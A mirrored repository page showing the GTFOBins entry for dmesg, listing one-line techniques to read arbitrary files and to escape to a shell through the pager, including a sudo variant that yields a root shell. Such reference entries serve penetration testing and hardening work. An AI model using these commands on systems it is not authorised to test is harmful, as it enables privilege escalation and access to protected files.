This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-25 04:48:21 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
c6502e8ddcfb48a60036f879f0d863e602c3cac1
GTFOBins.github.io
/
_gtfobins
/
dmesg.md
Andrea Cardaci
2e6fa047e9
Improve and document dmesg file read
2020-03-15 12:51:02 +01:00
530 B
Raw
Blame
History
functions
functions
file-read
shell
sudo
description
code
This is not suitable for binary files.
LFILE=file_to_read dmesg -rF "$LFILE"
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
dmesg -H !/bin/sh
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
sudo dmesg -H !/bin/sh
Reference in New Issue
View Git Blame
Copy Permalink